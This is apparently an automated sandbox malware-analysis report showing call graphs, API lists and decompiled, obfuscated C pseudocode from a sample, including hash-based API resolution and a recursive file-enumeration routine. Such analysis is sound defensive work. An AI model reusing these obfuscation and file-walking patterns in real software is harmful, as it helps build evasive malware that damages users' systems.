7057 7b3460 GetPEB 7057->7059 7058->7054 7059->7041 7059->7042 7059->7043 7059->7045 7059->7046 7059->7047 7059->7049 7059->7051 7059->7053 7059->7057 7060 7b3e60 GetPEB 7059->7060 7060->7059 7061 7bb110 7062 7bb124 7061->7062 7063 7b6060 GetPEB 7062->7063 7074 7bb1aa 7062->7074 7064 7bb136 7063->7064 7065 7b3310 GetPEB 7064->7065 7066 7bb14c 7065->7066 7067 7bb182 7066->7067 7068 7b3f00 GetPEB 7066->7068 7071 7b3f00 GetPEB 7067->7071 7067->7074 7069 7bb176 7068->7069 7070 7b3e60 GetPEB 7069->7070 7070->7067 7072 7bb19e 7071->7072 7073 7b3e60 GetPEB 7072->7073 7073->7074 7075 7b6208 7084 7b6202 7075->7084 7076 7b55b0 GetPEB 7076->7084 7077 7b4c80 GetPEB 7077->7084 7078 7b42c0 2 API calls 7078->7084 7079 7b624b 7080 7b3f00 GetPEB 7080->7084 7081 7b6490 7082 7b3e60 GetPEB 7082->7084 7083 7b3f00 GetPEB 7085 7b642d 7083->7085 7084->7076 7084->7077 7084->7078 7084->7079 7084->7080 7084->7082 7084->7085 7085->7081 7085->7083 7086 7b3e60 GetPEB 7085->7086 7086->7085 7087 7b6608 7128 7b65fd 7087->7128 7088 7b94d0 GetPEB 7088->7128 7089 7b8bb0 2 API calls 7089->7128 7090 7b706e 7095 7b8740 3 API calls 7090->7095 7091 7b9f30 GetPEB 7091->7128 7092 7b68df 7093 7b6dcd 7096 7bb2e0 GetPEB 7093->7096 7094 7b7410 GetPEB 7094->7128 7103 7b7073 7095->7103 7096->7092 7097 7b7061 7101 7b8d40 2 API calls 7097->7101 7098 7b72d0 GetPEB 7098->7128 7099 7b9050 GetPEB 7099->7128 7100 7bb1d0 GetPEB 7100->7128 7113 7b7066 7101->7113 7102 7b61e0 2 API calls 7102->7128 7104 7b80a0 2 API calls 7104->7128 7105 7b53d0 GetPEB 7105->7128 7106 7b6f27 GetTickCount 7106->7128 7107 7b9270 GetPEB 7107->7128 7108 7b3f00 GetPEB 7108->7128 7109 7b7120 3 API calls 7109->7128 7110 7b8700 GetPEB 7110->7128 7111 7b9860 6 API calls 7111->7128 7112 7b4220 GetPEB 7112->7128 7114 7b4770 2 API calls 7114->7128 7115 7b3310 GetPEB 7115->7128 7116 7b12b0 3 API calls 7116->7128 7117 7bb430 4 API calls 7117->7128 7118 7b8970 3 API calls 7118->7128 7119 7b8e80 2 API calls 7119->7128 7120 7b6060 GetPEB 7120->7128 7121 7b8400 2 API calls 7121->7128 7122 7b3e60 GetPEB 7122->7128 7123 7b6975 GetTickCount 7123->7128 7124 7b1840 2 API calls 7124->7128 7125 7b9620 2 API calls 7125->7128 7126 7bafe0 GetPEB 7126->7128 7127 7b3460 GetPEB 7127->7128 7128->7088 7128->7089 7128->7090 7128->7091 7128->7092 7128->7093 7128->7094 7128->7097 7128->7098 7128->7099 7128->7100 7128->7102 7128->7104 7128->7105 7128->7106 7128->7107 7128->7108 7128->7109 7128->7110 7128->7111 7128->7112 7128->7114 7128->7115 7128->7116 7128->7117 7128->7118 7128->7119 7128->7120 7128->7121 7128->7122 7128->7123 7128->7124 7128->7125 7128->7126 7128->7127 7129 7b4160 GetPEB 7128->7129 7129->7128 6862 7b3780 6863 7b37ab 6862->6863 6864 7b3795 6862->6864 6868 7b37dd 6863->6868 6869 7b3f00 GetPEB 6863->6869 6865 7b3f00 GetPEB 6864->6865 6866 7b379f 6865->6866 6867 7b3e60 GetPEB 6866->6867 6867->6863 6871 7b3812 6868->6871 6873 7b3f00 GetPEB 6868->6873 6870 7b37d1 6869->6870 6872 7b3e60 GetPEB 6870->6872 6876 7b3f00 GetPEB 6871->6876 6881 7b384a 6871->6881 6872->6868 6874 7b3806 6873->6874 6875 7b3e60 GetPEB 6874->6875 6875->6871 6877 7b383e 6876->6877 6879 7b3e60 GetPEB 6877->6879 6878 7b3876 6884 7b38d1 SHFileOperationW 6878->6884 6885 7b3f00 GetPEB 6878->6885 6879->6881 6880 7b3f00 GetPEB 6882 7b386a 6880->6882 6881->6878 6881->6880 6883 7b3e60 GetPEB 6882->6883 6883->6878 6886 7b38c0 6885->6886 6887 7b3e60 GetPEB 6886->6887 6888 7b38cc 6887->6888 6888->6884 6942 7b7e40 6949 7b7e50 6942->6949 6943 7b7f83 6945 7b38f0 2 API calls 6943->6945 6944 7b7f7a 6946 7b7f96 6945->6946 6947 7b34c0 GetPEB 6947->6949 6948 7b3f00 GetPEB 6948->6949 6949->6943 6949->6944 6949->6947 6949->6948 6950 7b3e60 GetPEB 6949->6950 6950->6949 7142 7b2b80 7143 7b2b99 7142->7143 7144 7b2baf 7142->7144 7145 7b3f00 GetPEB 7143->7145 7146 7b2ba3 7145->7146 7147 7b3e60 GetPEB 7146->7147 7147->7144

                                                        Executed Functions

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 007A0448
                                                          • Part of subcall function 007A1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,007A0EFD,00000000), ref: 007A1155
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 007A0463
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 007A0484
                                                        • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 007A048D
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 007A0492
                                                        • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 007A049F
                                                        • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 007A04A6
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 007A04B9
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 007A04E0
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 007A04F7
                                                        • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 007A0519
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 007A0530
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 007A0547
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 007A0562
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271261884.00000000007A0000.00000040.00000001.sdmp, Offset: 007A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7a0000_SampleRes.jbxd
                                                        Similarity
                                                        • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                        • String ID:
                                                        • API String ID: 482429597-0
                                                        • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction ID: 88f6737cad15f5a45197b868b08b1cc299ddfa21b30f049ab1b4e477a4293bb5
                                                        • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction Fuzzy Hash: 534150B5904344AEE710EB61C84AF6FB3EDABCA740F808E1CB74497241D67CD9048BA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 447 7b38f0-7b390b 448 7b3910-7b3915 447->448 449 7b391b 448->449 450 7b3a69-7b3a6e 448->450 451 7b3a5f-7b3a64 449->451 452 7b3921-7b3926 449->452 453 7b3acc-7b3adf call 7b34c0 450->453 454 7b3a70-7b3a75 450->454 451->448 455 7b392c-7b3931 452->455 456 7b3a17-7b3a1e 452->456 475 7b3afc-7b3b17 453->475 476 7b3ae1-7b3af7 call 7b3f00 call 7b3e60 453->476 458 7b3a77-7b3a7e 454->458 459 7b3ab6-7b3abb 454->459 465 7b3b70-7b3b77 455->465 466 7b3937-7b393c 455->466 462 7b3a3b-7b3a4f FindFirstFileW 456->462 463 7b3a20-7b3a36 call 7b3f00 call 7b3e60 456->463 460 7b3a9b-7b3ab1 458->460 461 7b3a80-7b3a96 call 7b3f00 call 7b3e60 458->461 459->448 464 7b3ac1-7b3acb 459->464 460->448 461->460 472 7b3b97-7b3ba1 462->472 473 7b3a55-7b3a5a 462->473 463->462 470 7b3b79-7b3b8f call 7b3f00 call 7b3e60 465->470 471 7b3b94 465->471 466->459 474 7b3942-7b3947 466->474 470->471 471->472 473->448 481 7b394d-7b3953 474->481 482 7b39f1-7b3a12 474->482 496 7b3b19-7b3b2f call 7b3f00 call 7b3e60 475->496 497 7b3b34-7b3b3f 475->497 476->475 488 7b3955-7b395d 481->488 489 7b3974-7b3976 481->489 482->448 493 7b396d-7b3972 488->493 500 7b395f-7b3963 488->500 492 7b3978-7b398b call 7b34c0 489->492 489->493 509 7b39a8-7b39ec call 7b38f0 call 7b3460 492->509 510 7b398d-7b39a3 call 7b3f00 call 7b3e60 492->510 493->448 496->497 512 7b3b5c-7b3b6b 497->512 513 7b3b41-7b3b57 call 7b3f00 call 7b3e60 497->513 500->489 505 7b3965-7b396b 500->505 505->489 505->493 509->448 510->509 512->448 513->512
                                                        C-Code - Quality: 63%
                                                        			E007B38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                        				short _v524;
                                                        				char _v1044;
                                                        				short _v1588;
                                                        				intOrPtr _v1590;
                                                        				struct _WIN32_FIND_DATAW _v1636;
                                                        				void* _v1640;
                                                        				intOrPtr _v1652;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t22;
                                                        				intOrPtr* _t24;
                                                        				intOrPtr* _t26;
                                                        				intOrPtr* _t28;
                                                        				intOrPtr* _t33;
                                                        				signed int _t34;
                                                        				void* _t39;
                                                        				intOrPtr* _t42;
                                                        				signed int _t46;
                                                        				intOrPtr* _t50;
                                                        				intOrPtr _t55;
                                                        				void* _t56;
                                                        				void* _t91;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				void* _t94;
                                                        				void* _t95;
                                                        				void* _t96;
                                                        				void* _t98;
                                                        
                                                        				_t91 = __ecx;
                                                        				_t95 = __edx;
                                                        				_v1640 = __ecx;
                                                        				_t22 = 0x25a25425;
                                                        				_t56 = _v1640;
                                                        				while(1) {
                                                        					L1:
                                                        					_t98 = _t22 - 0x25a25425;
                                                        					if(_t98 > 0) {
                                                        						break;
                                                        					}
                                                        					if(_t98 == 0) {
                                                        						_t22 = 0x29bc40d3;
                                                        						continue;
                                                        					} else {
                                                        						if(_t22 == 0x8a099c9) {
                                                        							if( *0x7be430 == 0) {
                                                        								 *0x7be430 = E007B3E60(_t56, E007B3F00(0x9bab0b12), 0x83efb111, _t95);
                                                        							}
                                                        							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
                                                        							_t56 = _t39;
                                                        							if(_t56 == 0xffffffff) {
                                                        								return _t39;
                                                        							} else {
                                                        								_t22 = 0x1a4f9837;
                                                        								continue;
                                                        							}
                                                        						} else {
                                                        							if(_t22 == 0xb46fa16) {
                                                        								_t42 =  *0x7bdba4;
                                                        								if(_t42 == 0) {
                                                        									_t42 = E007B3E60(_t56, E007B3F00(0x9bab0b12), 0xd274268a, _t95);
                                                        									 *0x7bdba4 = _t42;
                                                        								}
                                                        								return  *_t42(_t56);
                                                        							}
                                                        							if(_t22 != 0x1a4f9837) {
                                                        								L27:
                                                        								if(_t22 != 0x55fa1f4) {
                                                        									continue;
                                                        								} else {
                                                        									return _t22;
                                                        								}
                                                        							} else {
                                                        								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                        									_t46 = _a4( &_v1636, _a8);
                                                        									asm("sbb eax, eax");
                                                        									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
                                                        								} else {
                                                        									if(_v1636.cFileName != 0x2e) {
                                                        										L12:
                                                        										if(_t95 == 0) {
                                                        											goto L11;
                                                        										} else {
                                                        											_t94 = E007B34C0(0x7bd290);
                                                        											_t50 =  *0x7be158;
                                                        											if(_t50 == 0) {
                                                        												_t50 = E007B3E60(_t56, E007B3F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        												 *0x7be158 = _t50;
                                                        											}
                                                        											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
                                                        											E007B38F0( &_v1044, _t95, _a4, _a8);
                                                        											_t96 = _t96 + 0x1c;
                                                        											E007B3460(_t94);
                                                        											_t22 = 0x36cb81de;
                                                        										}
                                                        									} else {
                                                        										_t55 = _v1590;
                                                        										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
                                                        											L11:
                                                        											_t22 = 0x36cb81de;
                                                        										} else {
                                                        											goto L12;
                                                        										}
                                                        									}
                                                        								}
                                                        								continue;
                                                        							}
                                                        						}
                                                        					}
                                                        					L40:
                                                        				}
                                                        				if(_t22 == 0x29bc40d3) {
                                                        					_t93 = E007B34C0(0x7bd260);
                                                        					_t24 =  *0x7be158;
                                                        					if(_t24 == 0) {
                                                        						_t24 = E007B3E60(_t56, E007B3F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        						 *0x7be158 = _t24;
                                                        					}
                                                        					 *_t24( &_v524, 0x104, _t93, _t91);
                                                        					_t26 =  *0x7be494;
                                                        					_t96 = _t96 + 0x10;
                                                        					if(_t26 == 0) {
                                                        						_t26 = E007B3E60(_t56, E007B3F00(0x9bab0b12), 0x7facde30, _t95);
                                                        						 *0x7be494 = _t26;
                                                        					}
                                                        					_t92 =  *_t26();
                                                        					_t28 =  *0x7bdf30;
                                                        					if(_t28 == 0) {
                                                        						_t28 = E007B3E60(_t56, E007B3F00(0x9bab0b12), 0x5010a54d, _t95);
                                                        						 *0x7bdf30 = _t28;
                                                        					}
                                                        					 *_t28(_t92, 0, _t93);
                                                        					_t91 = _v1652;
                                                        					_t22 = 0x8a099c9;
                                                        					goto L1;
                                                        				} else {
                                                        					if(_t22 != 0x36cb81de) {
                                                        						goto L27;
                                                        					} else {
                                                        						_t33 =  *0x7bdf88;
                                                        						if(_t33 == 0) {
                                                        							_t33 = E007B3E60(_t56, E007B3F00(0x9bab0b12), 0xa53a5b1a, _t95);
                                                        							 *0x7bdf88 = _t33;
                                                        						}
                                                        						_t34 =  *_t33(_t56,  &_v1636);
                                                        						asm("sbb eax, eax");
                                                        						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
                                                        						goto L1;
                                                        					}
                                                        				}
                                                        				goto L40;
                                                        			}































                                                        0x007b38fa
                                                        0x007b38fc
                                                        0x007b38fe
                                                        0x007b3902
                                                        0x007b3907
                                                        0x007b3910
                                                        0x007b3910
                                                        0x007b3910
                                                        0x007b3915
                                                        0x00000000
                                                        0x00000000
                                                        0x007b391b
                                                        0x007b3a5f
                                                        0x00000000
                                                        0x007b3921
                                                        0x007b3926
                                                        0x007b3a1e
                                                        0x007b3a36
                                                        0x007b3a36
                                                        0x007b3a48
                                                        0x007b3a4a
                                                        0x007b3a4f
                                                        0x007b3ba1
                                                        0x007b3a55
                                                        0x007b3a55
                                                        0x00000000
                                                        0x007b3a55
                                                        0x007b392c
                                                        0x007b3931
                                                        0x007b3b70
                                                        0x007b3b77
                                                        0x007b3b8a
                                                        0x007b3b8f
                                                        0x007b3b8f
                                                        0x00000000
                                                        0x007b3b95
                                                        0x007b393c
                                                        0x007b3ab6
                                                        0x007b3abb
                                                        0x00000000
                                                        0x007b3acb
                                                        0x007b3acb
                                                        0x007b3acb
                                                        0x007b3942
                                                        0x007b3947
                                                        0x007b39fd
                                                        0x007b3a06
                                                        0x007b3a0d
                                                        0x007b394d
                                                        0x007b3953
                                                        0x007b3974
                                                        0x007b3976
                                                        0x00000000
                                                        0x007b3978
                                                        0x007b3982
                                                        0x007b3984
                                                        0x007b398b
                                                        0x007b399e
                                                        0x007b39a3
                                                        0x007b39a3
                                                        0x007b39bc
                                                        0x007b39d8
                                                        0x007b39dd
                                                        0x007b39e2
                                                        0x007b39e7
                                                        0x007b39e7
                                                        0x007b3955
                                                        0x007b3955
                                                        0x007b395d
                                                        0x007b396d
                                                        0x007b396d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x007b395d
                                                        0x007b3953
                                                        0x00000000
                                                        0x007b3947
                                                        0x007b393c
                                                        0x007b3926
                                                        0x00000000
                                                        0x007b391b
                                                        0x007b3a6e
                                                        0x007b3ad6
                                                        0x007b3ad8
                                                        0x007b3adf
                                                        0x007b3af2
                                                        0x007b3af7
                                                        0x007b3af7
                                                        0x007b3b0b
                                                        0x007b3b0d
                                                        0x007b3b12
                                                        0x007b3b17
                                                        0x007b3b2a
                                                        0x007b3b2f
                                                        0x007b3b2f
                                                        0x007b3b36
                                                        0x007b3b38
                                                        0x007b3b3f
                                                        0x007b3b52
                                                        0x007b3b57
                                                        0x007b3b57
                                                        0x007b3b60
                                                        0x007b3b62
                                                        0x007b3b66
                                                        0x00000000
                                                        0x007b3a70
                                                        0x007b3a75
                                                        0x00000000
                                                        0x007b3a77
                                                        0x007b3a77
                                                        0x007b3a7e
                                                        0x007b3a91
                                                        0x007b3a96
                                                        0x007b3a96
                                                        0x007b3aa1
                                                        0x007b3aa5
                                                        0x007b3aac
                                                        0x00000000
                                                        0x007b3aac
                                                        0x007b3a75
                                                        0x00000000

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 007B3A48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                        • Associated: 0000000A.00000002.2271273797.00000000007B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271290366.00000000007BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271300426.00000000007BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7b0000_SampleRes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID: .
                                                        • API String ID: 1974802433-248832578
                                                        • Opcode ID: b63dfc33cbecd740eaa3845ef23a36dab0d5820eccf3346a2396985d51ca35ff
                                                        • Instruction ID: 5f278573a470601afb986dd7ad5618c33e26e5e1d5e7e05a4c86cd28073ca6fb
                                                        • Opcode Fuzzy Hash: b63dfc33cbecd740eaa3845ef23a36dab0d5820eccf3346a2396985d51ca35ff
                                                        • Instruction Fuzzy Hash: 375125707042418BCB34EB689899BFB36A69BD0704F104A2AF556C7391EE7DDFC58392
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 61%
                                                        			E007B5040(intOrPtr __ecx, intOrPtr __edx) {
                                                        				char _v4;
                                                        				char _v8;
                                                        				char _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v20;
                                                        				intOrPtr _v24;
                                                        				void* _v28;
                                                        				void* _v36;
                                                        				intOrPtr _v44;
                                                        				signed int _v52;
                                                        				void* _v68;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t16;
                                                        				void* _t17;
                                                        				void* _t23;
                                                        				void* _t26;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t35;
                                                        				void* _t37;
                                                        				void* _t41;
                                                        				void* _t42;
                                                        				void* _t45;
                                                        				void* _t50;
                                                        				void* _t51;
                                                        				void* _t52;
                                                        				signed int _t53;
                                                        				void* _t58;
                                                        				intOrPtr* _t101;
                                                        				void* _t103;
                                                        				signed int _t104;
                                                        				void* _t105;
                                                        				void* _t107;
                                                        				void* _t108;
                                                        				void* _t112;
                                                        				void* _t115;
                                                        				void* _t116;
                                                        
                                                        				_t101 = _v12;
                                                        				_t58 = 0;
                                                        				_v16 = __edx;
                                                        				_t112 = 0;
                                                        				_v20 = __ecx;
                                                        				_t104 = 0x1ca940c1;
                                                        				while(1) {
                                                        					_t16 = _v28;
                                                        					while(1) {
                                                        						L2:
                                                        						_t115 = _t104 - 0x12f72f95;
                                                        						if(_t115 <= 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _t104 - 0x26342ffd;
                                                        						if(__eflags > 0) {
                                                        							__eflags = _t104 - 0x2fab56c4;
                                                        							if(_t104 != 0x2fab56c4) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t17 =  *0x7be494;
                                                        								__eflags = _t17;
                                                        								if(_t17 == 0) {
                                                        									_t17 = E007B3E60(_t58, E007B3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        									 *0x7be494 = _t17;
                                                        								}
                                                        								_t105 =  *_t17();
                                                        								__eflags =  *0x7bdd18;
                                                        								if( *0x7bdd18 == 0) {
                                                        									 *0x7bdd18 = E007B3E60(_t58, E007B3F00(0x9bab0b12), 0x9ff0609c, _t112);
                                                        								}
                                                        								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
                                                        								_t58 = _t16;
                                                        								__eflags = _t58;
                                                        								if(_t58 != 0) {
                                                        									_t104 = 0x8956eec;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(__eflags == 0) {
                                                        								_t23 =  *0x7be484;
                                                        								__eflags = _t23;
                                                        								if(_t23 == 0) {
                                                        									_t23 = E007B3E60(_t58, E007B3F00(0x26f5757c), 0x9e91db81, _t112);
                                                        									 *0x7be484 = _t23;
                                                        								}
                                                        								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
                                                        								asm("sbb esi, esi");
                                                        								_t26 =  *0x7be18c;
                                                        								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
                                                        								__eflags = _t26;
                                                        								if(_t26 == 0) {
                                                        									_t26 = E007B3E60(_t58, E007B3F00(0x26f5757c), 0x268fe5f0, _t112);
                                                        									 *0x7be18c = _t26;
                                                        								}
                                                        								_t16 =  *_t26(_v44);
                                                        								goto L40;
                                                        							} else {
                                                        								__eflags = _t104 - 0x1ca940c1;
                                                        								if(_t104 == 0x1ca940c1) {
                                                        									_t104 = 0x2fab56c4;
                                                        									continue;
                                                        								} else {
                                                        									__eflags = _t104 - 0x254bd927;
                                                        									if(_t104 != 0x254bd927) {
                                                        										L40:
                                                        										__eflags = _t104 - 0x1f0f293e;
                                                        										if(_t104 != 0x1f0f293e) {
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									} else {
                                                        										_t50 =  *0x7be29c;
                                                        										__eflags = _t50;
                                                        										if(_t50 == 0) {
                                                        											_t50 = E007B3E60(_t58, E007B3F00(0x26f5757c), 0x4574c66, _t112);
                                                        											 *0x7be29c = _t50;
                                                        										}
                                                        										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
                                                        										__eflags = _t51;
                                                        										if(_t51 == 0) {
                                                        											L13:
                                                        											_t104 = 0x11e09e52;
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										} else {
                                                        											_t52 =  *0x7bde08;
                                                        											__eflags = _t52;
                                                        											if(_t52 == 0) {
                                                        												_t52 = E007B3E60(_t58, E007B3F00(0x9bab0b12), 0xd8ef4c49, _t112);
                                                        												 *0x7bde08 = _t52;
                                                        											}
                                                        											_t53 =  *_t52();
                                                        											_t104 = 0x128dff18;
                                                        											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
                                                        											_t16 = _t58 + _v52 * 0x2c;
                                                        											__eflags = _t103 - _t16;
                                                        											_v68 = _t16;
                                                        											_t101 =  >=  ? _t58 : _t103;
                                                        											continue;
                                                        										}
                                                        										L55:
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L54:
                                                        						return _t16;
                                                        						goto L55;
                                                        					}
                                                        					if(_t115 == 0) {
                                                        						_t29 =  *0x7be494;
                                                        						__eflags = _t29;
                                                        						if(_t29 == 0) {
                                                        							_t29 = E007B3E60(_t58, E007B3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        							 *0x7be494 = _t29;
                                                        						}
                                                        						_t107 =  *_t29();
                                                        						_t31 =  *0x7bdf30;
                                                        						__eflags = _t31;
                                                        						if(_t31 == 0) {
                                                        							_t31 = E007B3E60(_t58, E007B3F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        							 *0x7bdf30 = _t31;
                                                        						}
                                                        						return  *_t31(_t107, 0, _t58);
                                                        					}
                                                        					_t116 = _t104 - 0x10f7fbef;
                                                        					if(_t116 > 0) {
                                                        						__eflags = _t104 - 0x11e09e52;
                                                        						if(_t104 == 0x11e09e52) {
                                                        							_t35 =  *0x7be494;
                                                        							__eflags = _t35;
                                                        							if(_t35 == 0) {
                                                        								_t35 = E007B3E60(_t58, E007B3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        								 *0x7be494 = _t35;
                                                        							}
                                                        							_t108 =  *_t35();
                                                        							_t37 =  *0x7bdf30;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E007B3E60(_t58, E007B3F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        								 *0x7bdf30 = _t37;
                                                        							}
                                                        							 *_t37(_t108, 0, _t112);
                                                        							_t104 = 0x12f72f95;
                                                        							continue;
                                                        						} else {
                                                        							__eflags = _t104 - 0x128dff18;
                                                        							if(_t104 != 0x128dff18) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t41 =  *0x7be270;
                                                        								__eflags = _t41;
                                                        								if(_t41 == 0) {
                                                        									_t41 = E007B3E60(_t58, E007B3F00(0x26f5757c), 0x56e230f9, _t112);
                                                        									 *0x7be270 = _t41;
                                                        								}
                                                        								_t42 =  *_t41(_v20,  *_t101, 1);
                                                        								__eflags = _t42;
                                                        								_v36 = _t42;
                                                        								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
                                                        								while(1) {
                                                        									_t16 = _v28;
                                                        									goto L2;
                                                        								}
                                                        							}
                                                        						}
                                                        					} else {
                                                        						if(_t116 == 0) {
                                                        							_t45 =  *0x7be200;
                                                        							__eflags = _t45;
                                                        							if(_t45 == 0) {
                                                        								_t45 = E007B3E60(_t58, E007B3F00(0x26f5757c), 0x16d40839, _t112);
                                                        								 *0x7be200 = _t45;
                                                        							}
                                                        							 *_t45(_v16, 1, _t112);
                                                        							goto L13;
                                                        						} else {
                                                        							if(_t104 == 0x5d498c4) {
                                                        								_t101 = _t101 + 0x2c;
                                                        								__eflags = _t101 - _t16;
                                                        								asm("sbb esi, esi");
                                                        								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t104 != 0x8956eec) {
                                                        									goto L40;
                                                        								} else {
                                                        									_t112 = E007B42C0(_t58, 0x2000);
                                                        									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L54;
                                                        				}
                                                        			}









































                                                        0x007b5047
                                                        0x007b504b
                                                        0x007b504d
                                                        0x007b5051
                                                        0x007b5053
                                                        0x007b5057
                                                        0x007b505c
                                                        0x007b505c
                                                        0x007b5060
                                                        0x007b5060
                                                        0x007b5060
                                                        0x007b5066
                                                        0x00000000
                                                        0x00000000
                                                        0x007b51af
                                                        0x007b51b5
                                                        0x007b52f9
                                                        0x007b52ff
                                                        0x00000000
                                                        0x007b5301
                                                        0x007b5301
                                                        0x007b5306
                                                        0x007b5308
                                                        0x007b531b
                                                        0x007b5320
                                                        0x007b5320
                                                        0x007b5327
                                                        0x007b532e
                                                        0x007b5330
                                                        0x007b5348
                                                        0x007b5348
                                                        0x007b5355
                                                        0x007b5357
                                                        0x007b5359
                                                        0x007b535b
                                                        0x007b535d
                                                        0x007b505c
                                                        0x007b505c
                                                        0x00000000
                                                        0x007b505c
                                                        0x007b505c
                                                        0x007b535b
                                                        0x007b51bb
                                                        0x007b51bb
                                                        0x007b5277
                                                        0x007b527c
                                                        0x007b527e
                                                        0x007b5291
                                                        0x007b5296
                                                        0x007b5296
                                                        0x007b52ac
                                                        0x007b52b0
                                                        0x007b52b2
                                                        0x007b52bd
                                                        0x007b52c3
                                                        0x007b52c5
                                                        0x007b52d8
                                                        0x007b52dd
                                                        0x007b52dd
                                                        0x007b52e6
                                                        0x00000000
                                                        0x007b51c1
                                                        0x007b51c1
                                                        0x007b51c7
                                                        0x007b526d
                                                        0x00000000
                                                        0x007b51cd
                                                        0x007b51cd
                                                        0x007b51d3
                                                        0x007b52e8
                                                        0x007b52e8
                                                        0x007b52ee
                                                        0x007b505c
                                                        0x007b505c
                                                        0x00000000
                                                        0x007b505c
                                                        0x007b505c
                                                        0x007b51d9
                                                        0x007b51d9
                                                        0x007b51de
                                                        0x007b51e0
                                                        0x007b51f3
                                                        0x007b51f8
                                                        0x007b51f8
                                                        0x007b521b
                                                        0x007b521d
                                                        0x007b521f
                                                        0x007b50ef
                                                        0x007b50ef
                                                        0x007b505c
                                                        0x007b505c
                                                        0x00000000
                                                        0x007b505c
                                                        0x007b5225
                                                        0x007b5225
                                                        0x007b522a
                                                        0x007b522c
                                                        0x007b523f
                                                        0x007b5244
                                                        0x007b5244
                                                        0x007b5249
                                                        0x007b524e
                                                        0x007b525b
                                                        0x007b525d
                                                        0x007b525f
                                                        0x007b5261
                                                        0x007b5265
                                                        0x00000000
                                                        0x007b5265
                                                        0x00000000
                                                        0x007b521f
                                                        0x007b51d3
                                                        0x007b51c7
                                                        0x007b51bb
                                                        0x007b53c0
                                                        0x007b53c0
                                                        0x00000000
                                                        0x007b53c0
                                                        0x007b506c
                                                        0x007b5367
                                                        0x007b536c
                                                        0x007b536e
                                                        0x007b5381
                                                        0x007b5386
